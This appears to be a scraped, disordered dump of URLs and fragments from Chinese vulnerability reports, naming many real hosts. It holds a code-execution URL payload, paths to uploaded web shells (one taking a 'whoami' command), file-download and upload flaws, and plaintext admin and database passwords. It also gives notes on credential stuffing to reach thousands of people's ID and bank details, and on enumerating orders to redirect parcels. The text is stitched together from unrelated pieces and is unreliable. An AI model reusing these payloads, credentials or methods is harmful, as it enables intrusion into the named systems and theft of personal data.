http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**//InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**//InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**//InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**//InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**//InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**//InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_yjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_yjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_yjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**//InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_tj.aspx_ 
http://**.**.**/InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**//InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**//InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**/InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**/InfoManage/zhiao/ziliao_xzph.aspx http://119.145.9.199:8000 http://119.145.9.199:8000/getInfo xpa.huawei.com//bigfile/1440x3761393042821625718.jpg%2Chttp%3A//xpa.huawei.com/img/1440x3761393043296125731.jpg%2Chttp%3A//xpa.huawei.com/img/ad_21375667948093143.jpg%2Chttp%3A//xpa.huawei.com//bigfile/adver/image/banner1375784854109521.jpg xpa.huawei.com/newContentDetails.html%3Fid%3D201401200082367%23conTag%2Chttp%3A//xpa.huawei.com/XPAD.html%2C/AppDownLoadDetail.html%3Fsoftware.id%3D201307270025630 http://223.202.19.238:1900/ http://223.202.19.238:8081/iswin/ http://223.202.19.238:8081/boss-self-pc/ https://sales.pa18.com/consoler/salesconsoler_region_list.htm http://**.**.**.**/zh-cn/read.jsp?id=1,如图所示: http://221.229.252.228/login.aspx http://**.**.**.**/jsp/login.jsp http://**.**.**.**:8080/rcc/servlet/complaintsMgrServlet?flag=detail&id=1950 http://epaper.uestc.edu.cn/epaper.tar.gz http://usercenter.playcrab.com/www/index.php http://film.spider.com.cn:80/ http://**.**.**.**/ylx/default.asp http://**.**.**.** http://**.**.**.**/DBMS/AddHoldInfo.aspx?holdId=115374&parent=0 http://**.**.**.**/login.aspx http://**.**.**.**/loginForPikachu.aspx http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/Person/Register.aspx http://www.hkbea.com.cn/.bash_history URL:http://**.**.**.** http://**.**.**.**,可撞库,用常用用户名和弱口令123456可获得几个有效账号,登陆后可查看全局通讯录(3900多名人员姓名、部门、职务、电话等),再用通讯录中人名拼音跑,可获得七八十个有效账号,登陆账号可查看日常公文、督办工作等敏感信息,尤其是账号zhangxiaomin和liuwei权限比较高,不仅可以查看自身简历,还可以查看其他1400名人员的简历(含姓名、身份证、电话、家庭成员、教育经历、培训经历、奖惩、出国等信息)。 http://nmg.91huayi.com/news.aspx?category=3 http://**.**.**.**/Default.aspx?userid=602 http://**.**.**.**/Default.aspx?userid=574 http://**.**.**.**/Default.aspx?userid=578 http://**.**.**.**/Default.aspx?userid=602 
http://**.**.**.**/Default.aspx?userid=574 http://**.**.**.**/Default.aspx?userid=578 http://**.**.**.**/Default.aspx?userid=32 http://**.**.**.**/Default.aspx?userid=580 http://**.**.**.**/Default.aspx?userid=572 http://**.**.**.**/Default.aspx?userid=600 http://**.**.**.**/Default.aspx?userid=577 http://**.**.**.**/Default.aspx?userid=570 http://**.**.**.**/Default.aspx?userid=573 http://**.**.**.**/Default.aspx?userid=531 http://**.**.**.**/Default.aspx?userid=449 http://**.**.**.**/Default.aspx?userid=368 http://**.**.**.**/Default.aspx?userid=283 http://**.**.**.**/Default.aspx?userid=535 http://**.**.**.**/Default.aspx?userid=370 http://**.**.**.**/Default.aspx?userid=369 http://**.**.**.**/Default.aspx?userid=366 http://**.**.**.**/Default.aspx?userid=272 http://**.**.**.**/Default.aspx?userid=420 http://**.**.**.**/Default.aspx?userid=371 http://**.**.**.**/Default.aspx?userid=525 http://**.**.**.**/Default.aspx?userid=501 http://**.**.**.**/Default.aspx?userid=480 http://**.**.**.**/Default.aspx?userid=520 http://**.**.**.**/Default.aspx?userid=424 http://**.**.**.**/Default.aspx?userid=252 http://**.**.**.**/Default.aspx?userid=509 http://**.**.**.**/Default.aspx?userid=232 http://**.**.**.**/Default.aspx?userid=453 http://**.**.**.**/Default.aspx?userid=483 http://**.**.**.**/Default.aspx?userid=444 http://**.**.**.**/Default.aspx?userid=514 http://**.**.**.**/Default.aspx?userid=198 http://**.**.**.**/Default.aspx?userid=423 http://**.**.**.**/Default.aspx?userid=409 http://**.**.**.**/Default.aspx?userid=315 http://**.**.**.**/Default.aspx?userid=109 http://**.**.**.**/Default.aspx?userid=123 http://**.**.**.**/Default.aspx?userid=485 http://**.**.**.**/Default.aspx?userid=403 http://**.**.**.**/Default.aspx?userid=93 http://**.**.**.**/Default.aspx?userid=417 http://**.**.**.**/Default.aspx?userid=481 http://**.**.**.**/Default.aspx?userid=512 http://**.**.**.**/Default.aspx?userid=517 http://**.**.**.**/Default.aspx?userid=431 
http://**.**.**.**/Default.aspx?userid=35 http://**.**.**.**/Default.aspx?userid=452 http://**.**.**.**/Default.aspx?userid=455 http://**.**.**.**/Default.aspx?userid=205 http://**.**.**.**/Default.aspx?userid=484 http://**.**.**.**/Default.aspx?userid=170 http://**.**.**.**/Default.aspx?userid=450 http://**.**.**.**/Default.aspx?userid=447 http://**.**.**.**/Default.aspx?userid=479 http://**.**.**.**/Default.aspx?userid=51 http://**.**.**.**/Default.aspx?userid=141 http://**.**.**.**/Default.aspx?userid=500 http://**.**.**.**/Default.aspx?userid=434 http://**.**.**.**/Default.aspx?userid=422 http://**.**.**.**/Default.aspx?userid=482 http://**.**.**.**/Default.aspx?userid=524 http://**.**.**.**/Default.aspx?userid=19 http://**.**.**.**/Default.aspx?userid=374 http://**.**.**.**/Default.aspx?userid=20 http://**.**.**.**/Default.aspx?userid=416 http://**.**.**.**/Default.aspx?userid=80 http://**.**.**.**/Default.aspx?userid=24 http://**.**.**.**/Default.aspx?userid=134 http://**.**.**.**/Default.aspx?userid=199 http://**.**.**.**/Default.aspx?userid=488 http://**.**.**.**/Default.aspx?userid=426 http://**.**.**.**/Default.aspx?userid=2 http://**.**.**.**/Default.aspx?userid=559 http://**.**.**.**/Default.aspx?userid=432 http://**.**.**.**/Default.aspx?userid=355 http://**.**.**.**/Default.aspx?userid=532 http://**.**.**.**/Default.aspx?userid=33 http://**.**.**.**/Default.aspx?userid=448 http://**.**.**.**/Default.aspx?userid=511 http://**.**.**.**/Default.aspx?userid=513 http://**.**.**.**/Default.aspx?userid=231 http://**.**.**.**/Default.aspx?userid=124 http://**.**.**.**/Default.aspx?userid=601 http://**.**.**.**/Default.aspx?userid=27 http://**.**.**.**/Default.aspx?userid=30 http://**.**.**.**/Default.aspx?userid=529 http://**.**.**.**/Default.aspx?userid=39 http://**.**.**.**/Default.aspx?userid=88 http://**.**.**.**/Default.aspx?userid=155 http://**.**.**.**/Default.aspx?userid=90 http://**.**.**.**/Default.aspx?userid=478 
http://**.**.**.**/Default.aspx?userid=227 http://**.**.**.**/Default.aspx?userid=34 http://**.**.**.**/Default.aspx?userid=584 http://**.**.**.**/Default.aspx?userid=659 http://**.**.**.**/Default.aspx?userid=4 http://**.**.**.**/Default.aspx?userid=178 http://**.**.**.**/Default.aspx?userid=176 http://**.**.**.**/Default.aspx?userid=598 http://**.**.**.**/Default.aspx?userid=263 http://**.**.**.**/Default.aspx?userid=590 http://**.**.**.**/Default.aspx?userid=249 http://**.**.**.**/Default.aspx?userid=589 http://**.**.**.**/Default.aspx?userid=408 http://**.**.**.**/Default.aspx?userid=518 http://**.**.**.**/Default.aspx?userid=37 http://**.**.**.**/Default.aspx?userid=580 http://**.**.**.**/Default.aspx?userid=599 http://**.**.**.**/Default.aspx?userid=594 http://**.**.**.**/Default.aspx?userid=14 http://**.**.**.**/Default.aspx?userid=593 http://**.**.**.**/Default.aspx?userid=544 http://**.**.**.**/Default.aspx?userid=591 http://**.**.**.**/Default.aspx?userid=579 http://**.**.**.**/Default.aspx?userid=564 http://**.**.**.**/Default.aspx?userid=560 http://**.**.**.**/Default.aspx?userid=221 http://**.**.**.**/Default.aspx?userid=347 http://**.**.**.**/Default.aspx?userid=581 http://**.**.**.**/Default.aspx?userid=592 http://**.**.**.**/Default.aspx?userid=557 http://**.**.**.**/Default.aspx?userid=470 http://**.**.**.**/Default.aspx?userid=541 http://**.**.**.**/Default.aspx?userid=31 http://**.**.**.**/Default.aspx?userid=182 http://**.**.**.**/Default.aspx?userid=597 http://**.**.**.**/Default.aspx?userid=558 http://**.**.**.**/Default.aspx?userid=492 http://**.**.**.**/Default.aspx?userid=603 http://**.**.**.**/Default.aspx?userid=438 http://**.**.**.**/Default.aspx?userid=583 http://**.**.**.**/Default.aspx?userid=551 http://**.**.**.**/Default.aspx?userid=507 http://**.**.**.**/Default.aspx?userid=569 http://**.**.**.**/Default.aspx?userid=588 http://**.**.**.**/Default.aspx?userid=442 http://**.**.**.**/Default.aspx?userid=441 
http://**.**.**.**/Default.aspx?userid=559 http://**.**.**.**/Default.aspx?userid=451 http://**.**.**.**/Default.aspx?userid=549 http://**.**.**.**/Default.aspx?userid=546 http://**.**.**.**/Default.aspx?userid=548 http://**.**.**.**/Default.aspx?userid=598 http://**.**.**.**/Default.aspx?userid=585 http://**.**.**.**/Default.aspx?userid=555 http://**.**.**.**/Default.aspx?userid=540 http://**.**.**.**/Default.aspx?userid=554 http://**.**.**.**/Default.aspx?userid=586 http://**.**.**.**/Default.aspx?userid=563 http://**.**.**.**/Default.aspx?userid=575 http://**.**.**.**/Default.aspx?userid=567 http://**.**.**.**/Default.aspx?userid=566 http://**.**.**.**/Default.aspx?userid=565 http://**.**.**.**/Default.aspx?userid=542 http://**.**.**.**/Default.aspx?userid=561 http://**.**.**.**/Default.aspx?userid=536 http://**.**.**.**/Default.aspx?userid=553 http://**.**.**.**/Default.aspx?userid=538 http://**.**.**.**/Default.aspx?userid=439 http://**.**.**.**/Default.aspx?userid=522 http://**.**.**.**/Default.aspx?userid=84 http://**.**.**.**/Default.aspx?userid=516 http://**.**.**.**/Default.aspx?userid=543 http://**.**.**.**/Default.aspx?userid=556 http://**.**.**.**/Default.aspx?userid=193 http://**.**.**.**/Default.aspx?userid=153 http://**.**.**.**/Default.aspx?userid=562 http://**.**.**.**/Default.aspx?userid=391 http://**.**.**.**/Default.aspx?userid=496 http://**.**.**.**/Default.aspx?userid=415 http://**.**.**.**/Default.aspx?userid=527 http://**.**.**.**/Default.aspx?userid=433 http://**.**.**.**/Default.aspx?userid=497 http://**.**.**.**/Default.aspx?userid=461 http://**.**.**.**/Default.aspx?userid=23 http://**.**.**.**/Default.aspx?userid=290 http://**.**.**.**/Default.aspx?userid=20 http://**.**.**.**/Default.aspx?userid=504 http://**.**.**.**/Default.aspx?userid=325 http://**.**.**.**/Default.aspx?userid=491 http://**.**.**.**/Default.aspx?userid=427 http://**.**.**.**/Default.aspx?userid=358 http://**.**.**.**/Default.aspx?userid=7 
http://**.**.**.**/Default.aspx?userid=150 http://**.**.**.**/Default.aspx?userid=47 http://**.**.**.**/Default.aspx?userid=428 http://**.**.**.**/Default.aspx?userid=180 http://**.**.**.**/Default.aspx?userid=397 http://**.**.**.**/Default.aspx?userid=258 http://**.**.**.**/Default.aspx?userid=359 http://**.**.**.**/Default.aspx?userid=411 http://**.**.**.**/Default.aspx?userid=367 http://**.**.**.**/Default.aspx?userid=309 http://**.**.**.**/Default.aspx?userid=477 http://**.**.**.**/Default.aspx?userid=487 http://**.**.**.**/Default.aspx?userid=351 http://**.**.**.**/Default.aspx?userid=298 http://**.**.**.**/Default.aspx?userid=351 http://**.**.**.**/Default.aspx?userid=550 http://**.**.**.**/Default.aspx?userid=400 http://**.**.**.**/Default.aspx?userid=445 http://**.**.**.**/download/report?file=/public/images/2014cwbb.pdf,很容易就找到漏洞的点。 http://**.**.**.**/public/images/2014cwbb.pdf可下载,所以确定是在网站根目录。 index.php/Ywfw/index07, http://**.**.**.**/download/report?file=/index.php http://**.**.**.**:8003/Login.aspx http://**.**.**.**:8002/ http://**.**.**.**:8003/Login.aspx http://**.**.**.**:8002/ http://**.**.**.**/Login.aspx http://**.**.**.**:8101/ http://**.**.**.**/ http://**.**.**.**:8666/Login.aspx http://**.**.**.**/ https://github.com/sugazaki/MZ_Delivery/blob/46a253462164ed1408d80f77453ab93d353f058b/config.js cn:3000 http://admonitor.miaozhen.com http://**.**.**.**/gobus.php?type=b&id=9 http://115.28.132.235:8088/ http://baom.jinri.cn/Product/productdetail.aspx?ProductId=1 http://api.xgo.com.cn/show_survey.php?surveyid=2 http://**.**.**.**/ http://www.dgwfund.com http://www.dgwfund.com/admin http://www.wxchina.com/index.php?s=/Product/product/gid/1*.html http://www.wxchina.com/index.php?s=/Jiejue/scheme_cp/aid/16.html http://www.wxchina.com/index.php?s=/Jiejue/scheme_cp_khjz/aid/16.html http://www.wxchina.com/index.php?s=/Server/server_info/aid/68.html http://www.wxchina.com/index.php?s=/About/a_info/aid/4.html http://**.**.**.**:8080/bmxt/ 
http://**.**.**.**:8080/bmxt/UserCl?metho http://**.**.**.** http://**.**.**.**:9080/home/index.action?recStaff=dldxzqkhb&storeId=13464&systemId=1 http://**.**.**.**/index.html http://**.**.**.**/type_al/0400000103.html http://**.**.**.**:80/actionDispatcher.do data:reqUrl=XDXMYQry&busiNum=XDXMY http://119.254.89.153/index.php/module/action/param1/%7B$%7Bphpinfo%28%29%7D%7D http://119.254.89.153/index.php/Public/login http://**.**.**.**/ http://link.58control.cn/AppLink.aspx?PlaceID=5&CityID=2&CateID=92241 http://unionold.58.com/linktip/link/LinkList.aspx http://unionold.58.com/main.aspx http://support.ebs.sdo.com/ http://support.ebs.sdo.com/WebResource.axd?d=3u5XW1zE2JLJAmeuBS5l_R1ULAeWcVMXdvr80XEkXjA1 http://support.ebs.sdo.com/ScriptResource.axd?d=TZHmGIqqcP_JGL7oII1K8NejJw7TGVhT0R7jo3_JDdAAAAAAAAAAAAAAAAAAAAAA0 http://**.**.**.**/wp-admin/ http://web.mysnail.cn/snailhome/ http://web.mysnail.cn/snailhome/Snail/FeedBack/index.html http://web.mysnail.cn/snailhome/Home/Index/index.html http://web.mysnail.cn/snailhome/Snail/FeedBack/index.html http://ibm.xiaozufan.com:80/ jdbc:oracle:thin:@**.**.**.**:1521:QDSC height:20px;BORDER https://vpn.ehousechina.com/por/service.csp?rnd=ponheogabjllicah http://www.you-fuli.com/ http://114.80.67.249:8080/Main.htm android:allowBackup="true http://www.sunyard.com/se_result.php,post注入,参数为“t1”。 www.sunyard.com http://www.sunyard.com http://www.sunyard.com/se_result.php http://**.**.**.**/bugs/wooyun-2015-0121230 http://**.**.**.**/login/Login.jsp?log http://**.**.**.**/tools/SWFUpload/upload.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://hr.jjshome.com/v/newitemworks/list?jobType=1&postId=7700177 http://106.39.118.134:8080/ http://106.39.118.134:8080/login?from=%2F http://106.39.118.134:8080/script http://106.39.118.134:8080/ http://106.39.118.134:8080/job/web3.0/ws/src/main/webapp/resources/ http://**.**.**.**/my/ajax_my_ims_init.php?ptid=44357&action=refreshcontent http://**.**.**.** 
http://cqwsw.91huayi.com/Page/InfoView.aspx?lm=ZCXX&id=120 http://www.longene.org/fileDownload.php?id=71 http://api.bilibili.com/x/history http://113.16.174.130:8080/manage/ybdl/logon.jsp http://113.16.174.130:8080/manage/nbyb/public/attachment.jsp?f=0.9410344776411355&action=attachmentstart&nameAttachMentIDs= http://**.**.**.**/bugs/wooyun-2010-096211 http://**.**.**.**/news_show.php?type_id=1&news_id=494 https://**.**.**.**/por/login_psw.csp http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191 http://mp.sdta.cn/jqticket/webManagement/login.jsp http://58.60.191.91:88/index.asp http://58.60.191.91:88/index.asp https://www.heshidai.com/schoolCenterLoad.act?paramMap.firstNo=1 http://**.**.**/ http://coc.cccap.org.cn/auto_web/coc_para_manage/report_paraList.aspx?ent=8100 http://wixiang.com/wixiang.tar.gz http://42.121.124.225/phpmyadmin/ http://www.wabuw.com:80/public/getAdCode.php?n=rel_index_right_1存在sqlmap注入 http://wooyun.org/bugs/wooyun-2010-053474 http://status.renren.com/GetSomeomeDoingList.do?userId=244318968&curpage=1 http://www.lamall.com/activity/anniversary?lid=24 http://**.**.**.**/ http://**.**.**.**/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://**.**.**.**/defaultroot/upload/information/2015092117112745434023058.jsp user:root passwd:root http://**.**.**.**/mvinfo.html?id=57 http://**.**.**.**/ http://218.22.40.178:7788/nbl_tms/ username:admin passwd:123456 http://218.22.40.178:5566/nbl_tms/ passwd:123456 http://**.**.**.**/bugs/wooyun-2015-0120232 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** https://sslvpn.niceit.cn/por/service.csp?rnd=flhooldgffjhgbdb http://**.**.**.**/ http://cnnc.chinahr.com/forms/cnncsocial/cv_info.asp?job_list=152714000001 http://sqlmap.org http://**.**.**.**//Login.aspx?Role=author 
http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**:100/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/newssystem/xsyt.asp?type1=&id=2896 http://merchant.spider.com.cn/merchantUserlogout.html http://zhuanzhen.91huayi.com/fuwai/login/login.php http://**.**.**.**/Admin/Login.asp http://**.**.**.**/admin/DataManage.asp http://**.**.**.**/Templets/gsanb.asp http://**.**.**.**/Login.aspx http://hanzhongcme.91huayi.com/Page/InfoView.aspx?lm=Notice&id=1 Portals.Web/Portal/smgportal.aspx# http://202.120.1.117/ http://admin.giftport.com.cn/fckeditor/editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/ http://**.**.**.**/console/ http://**.**.**.**/ma/ma3.jsp http://**.**.**.**/ma/out.jsp http://**.**.**.**/?k=88952634 url:http://**.**.**.**/modules/formmail/index.php?id_form=1 Id:0;609419464 Package:NTLM User:Guest Domain:WIN-OIB34EHHQ07 Id:0;208898 Package:NTLM User:Administrator Domain:WIN-OIB34EHHQ07 Id:0;50394 Package:NTLM http://www.laidingba.com/ http://1.85.2.249/online/web/sale/card/login.jsp http://1.85.2.249/online/sale/card/downloadPage.do?fileName=190.pdf http://**.**.**.**/admin/login.asp?Action=login http://**.**.**.**/ mysql:root http://job.shangdu.com/gnlaowu.php?act=1&city_id=1 http://**.**.**.**:8080/kingdee/disk/uploadProcess.action?parent=1&path=/&user_id=2 http://**.**.**.**:8080/kingdee/disk/upload/1231.jsp http://**.**.**.**:8080/kingdee/login/loginpage.jsp http://**.**.**.**/kingdee/login/loginpage.jsp http://**.**.**.**/nysweb/main/post.php?menu_id=39 http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:oradb http://**.**.**.**/policyquery.aspx?qc=1 
http://**.**.**.**/voteDisp.jsp?voteId=15 http://106.120.97.2:7001/etrading/ http://106.120.97.2:7001/console/login/LoginForm.jsp http://106.120.97.2:7001/ma/ma3.jsp jdbc:oracle:thin:@192.168.1.111:1521/orcl http://**.**.**.**/ http://180.153.27.11:7001/ user:tomcat password:china-sss http://www.dh366.com/ http://**.**.**.**/msgShow.aspx?iMark=-1&ListID=859 http://app.m.letv.com:80/android/mindex.phtml?mod=minfo&ctl=videoinfo&act=detail&id=1940748&pcode=130210000&version=1.0 http://**.**.**.**:8888 http://history.citicsinfo.com/login.shtml http://**.**.**.**/HelpList.aspx?guid=8301c423-69f6-4804-89a0-68d1e8dc5a4b http://**.**.**.**/,福建省移民局邮件系统,存在撞库,可用常用用户名和弱口令123456,获得一个有效账号,登陆后,可查看全局用户名,将用户名再做成字典跑,可获得27个有效账号。登陆账号后,可查看工作邮件,某些账号可查看福建省移民局通讯录,不少账号可查看直补移民名单,内含数万人员姓名、地址、身份证号等敏感信息,有的还含有银行卡号。 www.weizhongchou.com http://www.newjobs.com.cn//company/getlogo.aspx www.newjobs.com.cn//search/news_list.aspx www.newjobs.com.cn//search/news_list.aspx http://test.fenjinshe.com/backend/index.php http://ztsj.ztgame.com/stat.php?url= http://drops.wooyun.org/papers/1018 http://58.22.126.106:9000/irm/# http://os.51cto.com:80/ http://gszt2.ztgame.com/article.php?aid=978493&s=19 http://**.**.**.**/phpmyadmin http://**.**.**/lsan/include/login.jsp http://youxi.baidu.com/gjqt/ http://hl.pay.joy.cn/search/playtime.htm?Keyword=-1 http://m005.300188.cn:9080/ http://m005.300188.cn:9080//upload/upload/auth/vedio/1442892486471.jsp http://m005.300188.cn:9080//upload/upload/auth/vedio/1442888390070.jsp?pwd=023&i=whoami http://121.34.249.235/inc/XMLSPRYload/XMLSPRYdepartment.asp?unit=&usetype=0 http://121.34.249.235/sysbug/UpFileForm.asp http://121.34.249.235/sysbug/one.asp https://**.**.**.**/wbs/manager/msg/msg_findMsgsByGuest.do https://**.**.**.**/wbs/news/findNewsListByGuest.do http://119.147.214.215:8097/balance.php?a=exchange_sure http://**.**.**.**:88 http://**.**.**.**:8006/ 
http://api.daidongxi.com/daidongxi/V2/share/view/orderInfo/00000076***的一个链接,这个链接不能直接在浏览器里打开,要在微信里打开。修改后面的数字,发送到微信的聊天框里,打开,可以看到别人的订单信息,慢慢的遍历,拿到刚刚发货的信息,可以找顺丰客服修改地址的哦。哈哈,就不测试了。没有继续往下挖 http://x.kuwo.cn/KlAnchor/jsp/login.jsp http://www.9666.cn http://oa.hubeidaily.net/EntApp4.0/Login.aspx https://**.**.**.**/fhyfhy17/MyWork/blob/86a6c7eac8cf50e839a4ce018e399d7e26648a33/src/main/resources/conf/email.properties https://**.**.**.**/fhyfhy17/MyWork/tree/86a6c7eac8cf50e839a4ce018e399d7e26648a33/docs https://**.**.**.**/fhyfhy17/MyWork/blob/86a6c7eac8cf50e839a4ce018e399d7e26648a33/src/main/resources/conf/pay.properties http://**.**.**.**:8086/FunctionModule/RoleManagementModule/RoleUserInfoAdd.aspx https://github.com/TryWeiDao/dxl/blob/007085f78fdd9786b3247ccd0b3dae155d0ec9ad/dxl_testing/pay.py http://www.cmstop.com/ http://www.cmstop.cn/ https://cbss.10010.com http://www.chddh.com/bbs/html/20048.html http://tools.2345.com/ http://tools.2345.com:80/ http://**.**.**.**/home/gcxx/now_zyzbgg.aspx http://**.**.**.**/login/wumei/index.jsp https://github.com/xiaoyueer98/pc.rrl.com/blob/32695a23ac1b563f3222a2e84508dc94c7a30bed/ad/ad1/code.php http://zt.ythouse.com/more.php?ztype=15 inurl:health_area_detail.php?id= http://**.**.**.**/06/comm_serv_detail.php?id=5 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/comm_serv_detail.php?id=1727 http://**.**.**.**/jiannren/comm_serv_detail.php?id=260 http://**.**.**.**/comm_serv_detail.php?id=10 http://**.**.**.**/web/comm_serv_detail.php?id=25 http://**.**.**.**/comm_serv_detail.php?id=29 http://**.**.**.**/comm_serv_detail.php?id=3 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/old/comm_serv_detail.php?id=105 http://**.**.**.**/old/comm_serv_list.php?class_id=2 http://**.**.**.**/jiannren/comm_serv_list.php?class_id=4 http://**.**.**.**/comm_serv_list.php?class_id=3 http://**.**.**.**/comm_serv_list.php?class_id=3 
http://**.**.**.**/web/comm_serv_list.php?topage=2&class_id=1 http://**.**.**.**/comm_serv_list.php?class_id=4 http://**.**.**.**/health_area_list.php?class_id=1 http://**.**.**.**/cn/health_area_list.php?class_id=2 http://**.**.**.**/health_area_list.php?class_id=3 http://**.**.**.**/health_area_list.php?class_id=6 http://**.**.**.**/health_area_list.php?class_id=3 http://**.**.**.**/health_area_list.php?class_id=10 http://**.**.**.**/old/health_area_list.php?class_id=2 http://**.**.**.**/jiannren/health_area_list.php?class_id=1 http://**.**.**.**/health_area_list.php?class_id=7 http://**.**.**.**/health_area_list.php?class_id=7 http://**.**.**.**/06/health_area_list.php?class_id=6 http://**.**.**.**/health_area_detail.php?id=43 http://**.**.**.**/old/health_area_detail.php?id=33 http://**.**.**.**/health_area_detail.php?id=31 http://**.**.**.**/health_area_detail.php?id=127 http://**.**.**.**/health_area_detail.php?id=4 http://**.**.**.**/health_area_detail.php?id=127 http://**.**.**.**/cn/health_area_detail.php?id=3 http://**.**.**.**/health_area_detail.php?id=3 http://**.**.**.**/jiannren/health_area_detail.php?id=157 http://**.**.**.**/06/health_area_detail.php?id=15 http://**.**.**.**/doctor_data_list.php?medical_dep_id=7 http://**.**.**.**/06/doctor_data_list.php?sub_dep_id=1 http://**.**.**.**/thop/doctor_data_list.php?sub_dep_id=2 http://**.**.**.**/doctor_data_list.php?medical_dep_id=4 http://**.**.**.**/doctor_data_list.php?sub_dep_id=10 http://**.**.**.**/jiannren/doctor_data_list.php?medical_dep_id=5 http://**.**.**.**/qa_detail.php?id=14 http://**.**.**.**/qa_detail.php?id=50 http://**.**.**.**/qa_detail.php?id=76 http://**.**.**.**/qa_detail.php?id=43 http://**.**.**.**/qa_detail.php?id=15 http://**.**.**.**/site_item_content_7.php?site_map_item_id=101 http://**.**.**.**/ymca/site_item_content_7.php?site_map_item_id=94 http://**.**.**.**/site_item_content_7.php?site_map_item_id=617 http://**.**.**.**/site_item_content_7.php?site_map_item_id=390 
http://**.**.**.**/site_item_list_5.php?site_map_item_id=91 http://**.**.**.**/site_item_list_5.php?site_map_item_id=24 http://**.**.**.**/site_item_list_5.php?site_map_item_id=27 http://**.**.**.**/site_item_list_5.php?site_map_item_id=27 http://**.**.**.**/tcc/site_item_list_5.php?topage=2&site_map_item_id=13 http://**.**.**.**/site_item_list_5.php?site_map_item_id=532 http://**.**.**.**/site_item_list_5.php?topage=2&site_map_item_id=48 http://**.**.**.**/site_item_list_5.php?site_map_item_id=1 http://**.**.**.**/site_item_list_5.php?site_map_item_id=13 http://**.**.**.**/medical_serv_list.php?article_id=3 http://**.**.**.**/medical_serv_list.php?article_id=2 http://**.**.**.**/medical_serv_list.php?article_id=3 http://**.**.**.**/medical_serv_list.php?article_id=3 http://**.**.**.**/06/medical_serv_list.php?article_id=9 http://**.**.**.**/medical_serv_list.php?article_id=2 http://**.**.**.**/admin.php http://**.**.**.**/phpMyAdmin/ http://**.**.**.**/1.php 也删了吧 http://**.**.**.**/p.php http://**.**.**.**/,weblogic的UDDI页面泄露,导致可以探测内网信息。 http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp, http://store.sf-express.com/index.html http://123.58.179.90:8983/solr/#/~logging https://gitlab.ws.netease.com/explore/projects http://**.**.**.**/index.php?m=member&c=index&a=account_manage_avatar&t=1 http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=b0adVAhUVlUCAAUFUg5TB1MJDFNSBFFbUlADVApAXwEFVBYUSzsHEEZYal4HTww0MXFgMQ8eM1wrBGwHRFdBE08MQFZeHBEiSHdARVQBZw 